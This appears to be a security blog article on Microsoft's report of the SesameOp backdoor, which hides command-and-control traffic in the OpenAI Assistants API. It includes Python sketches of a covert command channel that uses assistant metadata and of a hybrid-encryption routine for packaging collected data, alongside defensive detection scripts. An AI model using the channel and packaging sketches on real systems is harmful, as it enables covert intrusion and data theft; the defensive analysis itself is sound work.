Microsoft’s latest threat report has revealed a worrying trend: attackers are now using artificial-intelligence platforms as part of their command-and-control systems. The newly discovered SesameOp backdoor abuses the OpenAI Assistants API to hide its activity inside normal network traffic. Instead of relying on custom servers or shady hosting, the operators turned OpenAI’s trusted cloud service into their covert communications channel. The discovery underscores how criminals are adapting quickly, transforming legitimate AI tools into stealthy conduits for malware.
How the SesameOp Backdoor Works
According to Microsoft’s Detection and Response Team (DART), SesameOp infiltrates systems through an obfuscated loader named Netapi64.dll. Once installed, the loader is pulled into legitimate development tools, including Visual Studio utilities, via .NET AppDomainManager injection, giving it persistence while hiding behind trusted processes. The malware then loads a .NET component called OpenAIAgent.Netapi64, which connects directly to the OpenAI Assistants API over HTTPS.
What makes this noteworthy is how it hides commands. Each infected machine is tagged through its assistant’s name, while instructions arrive as encrypted messages stored in the assistant’s metadata. The implant decrypts and executes each instruction, then quietly sends the results back through the same API. Because all communication flows through legitimate OpenAI servers, the traffic looks perfectly normal to most monitoring tools.
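To make the mechanism concrete, here is a minimal sketch of how such a channel could be staged with the official openai Python SDK. The assistant name, metadata key, and payload below are hypothetical illustrations of the pattern Microsoft describes, not values recovered from SesameOp, and the actual encryption step is omitted.

```python
import base64

from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Hypothetical illustration of the reported channel: the assistant's name
# tags a specific victim, and a metadata value carries an encrypted,
# Base64-encoded instruction blob.
command_blob = base64.b64encode(b"<encrypted command bytes>").decode()

client.beta.assistants.create(
    model="gpt-4o-mini",
    name="host-7f3a9c",              # victim identifier (hypothetical)
    metadata={"cmd": command_blob},  # covert payload slot (hypothetical key)
)

# The implant on the infected host would later enumerate assistants, match
# its own tag, and decode the metadata value it finds there.
for assistant in client.beta.assistants.list():
    if assistant.name == "host-7f3a9c":
        payload = base64.b64decode(assistant.metadata["cmd"])
```

Nothing here is exotic: both sides only ever speak ordinary, authenticated HTTPS to api.openai.com, which is precisely what makes the traffic so hard to single out.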
Technical Details and Evasion Methods
SesameOp’s configuration, including an API key, a dictionary name, and a proxy address, is packed inside its binary. The backdoor compresses data with GZIP, encrypts it with a hybrid AES/RSA scheme in which AES protects the data and RSA wraps the AES key, and Base64-encodes the result before transmission. Its authors also ran the code through Eazfuscator.NET to make reverse engineering more difficult.
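Microsoft has not published the exact routine, but the described pipeline is straightforward to picture. The sketch below shows one plausible hybrid packaging step using the cryptography package; the AES-256/CBC mode, PKCS7 padding, OAEP parameters, and blob layout are assumptions for illustration, not details recovered from the sample.

```python
import base64
import gzip
import os

from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import padding as asym_padding, rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def pack(plaintext: bytes, operator_public_key) -> str:
    """GZIP-compress, AES-encrypt, RSA-wrap the AES key, then Base64 the blob."""
    compressed = gzip.compress(plaintext)

    # Fresh AES-256 key and IV per message (CBC with PKCS7 padding, assumed).
    aes_key, iv = os.urandom(32), os.urandom(16)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(compressed) + padder.finalize()
    encryptor = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).encryptor()
    ciphertext = encryptor.update(padded) + encryptor.finalize()

    # The symmetric key travels RSA-encrypted, so only the operators'
    # private key can recover it.
    wrapped_key = operator_public_key.encrypt(
        aes_key,
        asym_padding.OAEP(
            mgf=asym_padding.MGF1(algorithm=hashes.SHA256()),
            algorithm=hashes.SHA256(),
            label=None,
        ),
    )

    # Base64 keeps the binary blob safe to store in a JSON string field.
    return base64.b64encode(wrapped_key + iv + ciphertext).decode()

# Usage: generate a throwaway key pair and package a fake "result".
operator_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
blob = pack(b"collected-file-listing...", operator_key.public_key())
```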
By blending into developer workflows and trusted .NET binaries, SesameOp can persist undetected for months. Its command types range from executing scripts and fetching payloads to collecting files for exfiltration. Because the connection targets api.openai.com, defenders rarely suspect that the traffic could conceal malware instructions.
Detection and Mitigation
Microsoft recommends continuous monitoring of outbound requests to OpenAI endpoints, especially from machines that should not use AI services. Security teams should enable tamper protection and ensure endpoint detection tools operate in block mode rather than alert-only mode. Rotating and auditing AI API keys regularly helps prevent attackers from exploiting stolen credentials.
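As a starting point, even a simple log-review script can surface machines talking to OpenAI that have no business doing so. The sketch below assumes a proxy log exported as CSV with timestamp, src_host, and dest_host columns; the column names and the allow-list are placeholders to adapt to your own telemetry.

```python
import csv

# Hosts expected to reach OpenAI (hypothetical allow-list; adapt to your estate).
APPROVED_HOSTS = {"ml-dev-01", "ml-dev-02"}
OPENAI_DOMAINS = {"api.openai.com"}

def unexpected_openai_traffic(proxy_log_csv: str) -> list[dict]:
    """Return proxy-log rows where a non-approved host reached an OpenAI endpoint."""
    findings = []
    with open(proxy_log_csv, newline="") as f:
        for row in csv.DictReader(f):
            if row.get("dest_host") in OPENAI_DOMAINS and row.get("src_host") not in APPROVED_HOSTS:
                findings.append(row)
    return findings

for hit in unexpected_openai_traffic("proxy_log.csv"):
    print(f"{hit['timestamp']}  {hit['src_host']} -> {hit['dest_host']}")
```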
Network segmentation remains essential: developer and production environments should be isolated to contain any breach. Administrators can also inspect assistant creation logs to detect unusual metadata or encoded messages. These steps make it harder for attackers to use AI platforms as hidden control planes.
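One practical way to audit an organisation’s own assistant inventory is to enumerate it via the openai SDK and flag metadata values that look like encoded blobs. In the sketch below, the length and entropy thresholds are illustrative placeholders rather than vendor guidance.

```python
import base64
import math
from collections import Counter

from openai import OpenAI

def shannon_entropy(s: str) -> float:
    """Bits per character; random Base64 sits near 6, English prose near 4."""
    counts = Counter(s)
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def looks_encoded(value: str) -> bool:
    """Heuristic: long, valid Base64, high entropy -> possible covert payload."""
    if len(value) < 64:
        return False
    try:
        base64.b64decode(value, validate=True)
    except Exception:
        return False
    return shannon_entropy(value) > 4.5  # placeholder threshold; tune on real data

client = OpenAI()  # audits the organisation's own account
for assistant in client.beta.assistants.list():
    for key, value in (assistant.metadata or {}).items():
        if looks_encoded(str(value)):
            print(f"review assistant {assistant.id} ({assistant.name!r}): metadata[{key!r}]")
```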
Wider Implications for AI Security
SesameOp shows that threat actors no longer need to compromise vulnerable servers or stand up custom infrastructure; they can simply misuse trusted cloud APIs to the same effect. As AI integration grows, so does the attack surface. Organisations must therefore treat AI services like any other critical infrastructure, complete with monitoring, access controls, and abuse detection.
For AI providers, this incident is a warning to implement stronger behavioural checks that can identify abnormal API usage. Monitoring the context of assistant creation, metadata patterns, and communication frequency could reveal similar abuses before they escalate.
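As a toy illustration of one such behavioural check, the sketch below keeps a sliding window of request timestamps per API key and flags any key whose cadence exceeds a baseline, the sort of machine-like polling rhythm a beaconing implant produces; the window size and threshold are hypothetical.

```python
from collections import defaultdict, deque

class RateAnomalyDetector:
    """Flag API keys whose request rate exceeds a per-window baseline."""

    def __init__(self, window_seconds: float = 300.0, max_requests: int = 50):
        self.window = window_seconds
        self.limit = max_requests
        self.events: dict[str, deque] = defaultdict(deque)

    def record(self, api_key_id: str, timestamp: float) -> bool:
        """Record one request; return True if this key now looks anomalous."""
        q = self.events[api_key_id]
        q.append(timestamp)
        while q and q[0] < timestamp - self.window:
            q.popleft()
        return len(q) > self.limit

# Usage: feed each API event through the detector as it arrives.
detector = RateAnomalyDetector()
# if detector.record(event.key_id, event.time): raise an alert for review
```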
Final Thoughts
The SesameOp backdoor represents a new stage in cyber operations where legitimate AI services become tools for deception. By embedding its control traffic inside the OpenAI Assistants API, the malware demonstrated how easily trusted platforms can be repurposed for stealth. Security teams must now include AI endpoints in their visibility plans, enforce strict API governance, and rotate credentials frequently. As adversaries continue to blur the line between legitimate cloud use and abuse, awareness and proactive monitoring remain the strongest defence.